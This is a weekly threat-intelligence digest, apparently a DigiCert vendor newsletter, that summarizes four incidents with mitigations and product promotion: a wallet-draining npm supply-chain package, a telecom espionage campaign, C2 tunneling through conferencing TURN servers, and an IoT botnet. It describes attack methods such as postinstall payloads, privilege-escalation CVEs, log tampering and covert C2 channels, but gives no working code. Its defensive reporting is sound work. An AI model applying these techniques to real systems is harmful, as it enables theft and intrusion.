DigiCert’s Open-Source Intelligence (OSINT) Report – August 1 – August 7, 2025

AI-Generated Malicious NPM Package Drains Solana Funds from 1,500+ Before Takedown

(TLP: CLEAR) In late July 2025, a malicious npm package named @kodane/patch-manager was published by a user identified as “Kodane.” Disguised as a utility for cache management and license validation, the package appeared legitimate, featuring polished documentation, consistent formatting, and verbose inline comments — all stylistically consistent with outputs from large language models like Claude AI. These traits included emoji usage, “Enhanced” prefixes, and AI-style README formatting, suggesting that the package was likely generated or heavily assisted by AI. Despite its seemingly benign appearance, the package had a hidden postinstall script that activated upon installation. This script deployed a malicious payload into hidden directories on macOS, Linux, and Windows systems, allowing the malware to persist silently without requiring any direct execution from the developer. By the time it was detected and removed, the package had been downloaded over 1,500 times across 17 versions.

(TLP: CLEAR) Comments: Once installed, the payload generated a unique machine ID and communicated with a command-and-control (C2) server hosted at sweeper-monitor-production.up.railway.app. The malware scanned the infected system for Solana wallet files and, upon detection, automatically drained funds to a hardcoded Solana address. The attack was subtle enough to leave behind small amounts of crypto to cover transaction fees, minimizing suspicion. Logs from the C2 server revealed multiple infections and successful wallet sweeps, indicating that the attacker actively monitored and operated the infrastructure during the campaign.

This incident represents a sophisticated and concerning evolution in supply-chain attacks. By leveraging AI to craft convincing package content, attackers are now able to bypass superficial code reviews and automated scanners, exploiting the trust developers place in open-source ecosystems like npm. The attack highlights the risks associated with automated dependency updates and the need for tighter scrutiny over third-party code. Security experts recommend thorough package reviews, monitoring for suspicious post install behavior, locking dependency versions, and implementing tools that can detect AI-generated or malicious patterns in code. The event underscores the growing threat of AI-assisted malware in developer environments and the urgent need for AI-aware security practices in software supply chains.
(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”. By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users.  This can be done via a protective DNS or forward web proxy solution with website categories feeds.

(TLP: CLEAR) Digicert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories, including botnet Command and Control (C2), as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://thehackernews.com/2025/08/ai-generated-malicious-npm-package.html

CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign

(TLP: CLEAR) Between February and November 2024, a state-sponsored threat actor known as CL‑STA‑0969 conducted a highly covert espionage campaign targeting telecommunications organizations in Southeast Asia, deploying sophisticated malware and maintaining long‑term remote control over critical infrastructure. According to researchers at Palo Alto Networks Unit 42, the group gained initial access through brute‑force attacks against SSH, using telecom-specific credential dictionaries to break into systems. Once inside, they escalated privileges via well-known Linux vulnerabilities—DirtyCOW (CVE‑2016‑5195), PwnKit (CVE‑2021‑4034), and sudo heap‑overflow (CVE‑2021‑3156)—to obtain root-level access. The attackers deployed an arsenal of custom implants tailored for telecom environments, such as AuthDoor (a malicious PAM module for persistence), Cordscan (for mobile location data harvesting), GTPDOOR (targeting GPRS roaming exchanges), EchoBackdoor (using ICMP echo requests for control), ChronosRAT (offering keystroke logging and remote shell access), and NoDepDNS (a Golang-based DNS command-and-control backdoor). They routed traffic through overlooked protocols like DNS tunneling, ICMP, and GTP, often via compromised mobile roaming networks and internal proxies, further masking their C2 traffic. To evade detection, CL‑STA‑0969 applied strong operational security (OPSEC) tactics: process masquerading with names resembling kernel threads or system services, log sanitization via tools like utmpdump and sed, disabling SELinux protections, and filesystem time stomping to impede forensic efforts. Despite the lengthy infiltration, Unit 42 found no evidence of data exfiltration or tracking of mobile devices—though tools like Cordscan suggest collection of location data may have been a goal.

(TLP: CLEAR) Comments: This campaign underscores a serious escalation in telecommunications supply‑chain threats: leveraging niche protocol knowledge, bespoke malware, and environmental adaptation, CL‑STA‑0969 exemplifies how nation‑state actors can persistently control critical infrastructure without detection. Mitigation steps include enforcing multi‑factor authentication (MFA) and disabling direct root SSH login, auditing for unauthorized PAM modules, employing egress filtering to block covert C2 channels, and deploying intrusion detection systems (NIDS) to flag anomalous protocol usage or DNS/ICMP tunneling.
(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency Selecting a Protective DNS (PDNS) Service: “A core capability of PDNS is the ability to categorize domain names based on threat intelligence. PDNS services typically leverage open source, commercial, and governmental information feeds of known malicious domains. These feeds enable coverage of domain names found at numerous points of the network exploitation lifecycle. Some solutions may also detect novel malicious domains based on pattern recognition. The types of domains typically addressed by a PDNS system include the following:

• Phishing: Sites known to host applications that maliciously collect personal or organizational information, including credential harvesting scams. These domains may include typo-squats – or close lookalikes of common domains. PDNS can protect users from accidentally connecting to a potentially malicious link.
• Malware distribution and command and control: Sites known to serve malicious content or used by threat actors to command-and-control malware. For example, these may include sites hosting malicious JavaScript® files or domains that host advertisements that collect information for undesired profiling. PDNS can block and alert on known malicious connection attempts.
• Domain generation algorithms: Sites with programmatically generated domain names that are used by malware to circumvent static blocking. Advanced malware – including some botnets – depend on the ability to communicate with command and control (C2) infrastructure. Cyber threat actors use domain generation algorithms (DGAs) for malware to circumvent static blocking – either by domain name or IP – through programmatically generating domain names according to a pre-set seed. PDNS can offer protection from malware DGAs by analyzing every domain’s textual attribute and tagging those associated with known DGA attributes, such as high entropy.
• Content filtering: Sites whose content is in certain categories that are against an organization’s access policies. Although an ancillary benefit to malware protection, PDNS can use a categorization of various domains’ use cases (e.g., ‘gambling’) and warn or block on those that are deemed a risk for a given environment.

(TLP: CLEAR) Digicert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), uses Cyber Threat Intelligence feeds, domain categories, and other detection engines to assess DNS queries in real-time and block domains that are being used for phishing, malware delivery, and malware Command and Control (C2). This reduces the quantity and impact of malware infections.

Source: https://thehackernews.com/2025/08/cl-sta-0969-installs-covert-malware-in.html

New Ghost Calls Tactic Abuses Zoom and Microsoft Teams for C2 Operations

(TLP: CLEAR) Researchers revealed a novel evasion technique dubbed “Ghost Calls,” which leverages TURN (Traversal Using Relays around NAT) servers employed by apps like Zoom and Microsoft Teams to conceal command‑and‑control (C2) traffic inside genuine video‑conference data streams. By tunneling malicious communications through the infrastructure of trusted conferencing platforms, attackers effectively bypass traditional security controls—such as firewalls, proxy inspection, and TLS monitoring—since the malicious traffic blends seamlessly with legitimate WebRTC sessions. The Ghost Calls method does not rely on exploiting vulnerabilities in Zoom or Teams themselves but rather misuses their TURN servers and protocol flow. It uses legitimate user credentials and WebRTC signaling to establish encrypted tunnels, hiding exfiltration or C2 channels within normal videoconference traffic patterns. Security firm Praetorian has even released an open‑source toolkit called TURNt, which demonstrates how to deploy this covert tunneling method via conferencing infrastructure.
(TLP: CLEAR) Comments: Because traffic appears to originate from trusted collaboration services, Ghost Calls presents a significant challenge for network detection tools and enterprise defenders. Standard network monitoring sees legitimate TURN relay endpoints, while TLS inspection cannot reliably distinguish user‑initiated conferencing from hidden attacker‑controlled C2 flows. Ghost Calls is a sophisticated post‑exploitation technique that weaponizes conferencing platforms to stealthily tunnel control traffic. Organizations are advised to monitor TURN server usage patterns closely, enforce strict session authentication policies, and consider anomaly detection on WebRTC signaling and relay behavior to uncover abuse.

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) DE.CM-01: “Networks and network services are monitored to find potentially adverse events”. One of the ways to detect phishing, malware droppers, and command and control (C2) is at the network level. Intrusion Detection Systems (IDS), Intrusion Detection Systems (IPS), and next-generation firewalls can be used with a protective DNS solution to detect these malicious activities as they traverse the network, even if the initial infection occurs via physical media or on another network such as a hotel or airport.

(TLP: CLEAR) Digicert: Digicert’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories, including botnet Command and Control (C2), as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Source: https://www.bleepingcomputer.com/news/security/new-ghost-calls-tactic-abuses-zoom-and-microsoft-teams-for-c2-operations/

RondoDox Botnet Exploits Flaws in TBK DVRs and Four-Faith Routers to Launch DDoS Attacks

(TLP: CLEAR) On July 8, 2025, researchers revealed an emerging botnet dubbed RondoDox, which leverages known command injection vulnerabilities in specific TBK DVR and Four‑Faith router models. These include CVE‑2024‑3721 affecting TBK DVR‑4104 and DVR‑4216, and CVE‑2024‑12856 targeting Four‑Faith F3x24 and F3x36 routers. Most of these devices operate in environments like retail stores, warehouses, and small offices in locations where they often remain unpatched, exposed, and overlooked for extended periods.

(TLP: CLEAR) Comments: RondoDox capitalizes on this neglected infrastructure, enabling attackers to commandeer compromised devices into a stealthy botnet. Once infiltrated, these devices can be used for distributed denial-of-service (DDoS) attacks, proxy infrastructure, or other malicious operations. The botnet is particularly noteworthy for its capability to camouflage traffic by impersonating legitimate protocols and platforms such as gaming services and VPN connections, thereby evading conventional detection systems. These combined vulnerabilities have been previously exploited by Mirai botnet variants, underscoring the persistent and evolving threat posed by IoT and embedded device weaknesses.

(TLP: CLEAR) Recommended best practices/regulations:  Request for Comments (RFC) 2827/Best Common Practice (BC) 38: “Ingress traffic filtering at the periphery of Internet connected networks will reduce the effectiveness of source address spoofing denial of service attacks. Network service providers and administrators have already begun implementing this type of filtering on periphery routers, and it is recommended that all service providers do so as soon as possible. In addition to aiding the Internet community as a whole to defeat this attack method, it can also assist service providers in locating the source of the attack if service providers can categorically demonstrate that their network already has ingress filtering in place on customer links.”

(TLP: CLEAR) Digicert:  Digicert UltraDDoS Protect provides flexible, automated, and always-on protection across 15 Points of Presence (PoPs) and >15Tbps of DDoS mitigation capacity to enable customer availability and performance under even the largest and most complex DDoS attacks (layer 3 through layer 7). An automated intelligence feed that is constantly updating mitigation devices allows protection against emerging attack vectors and common attack sources.
Source: https://thehackernews.com/2025/07/rondodox-botnet-exploits-flaws-in-tbk.html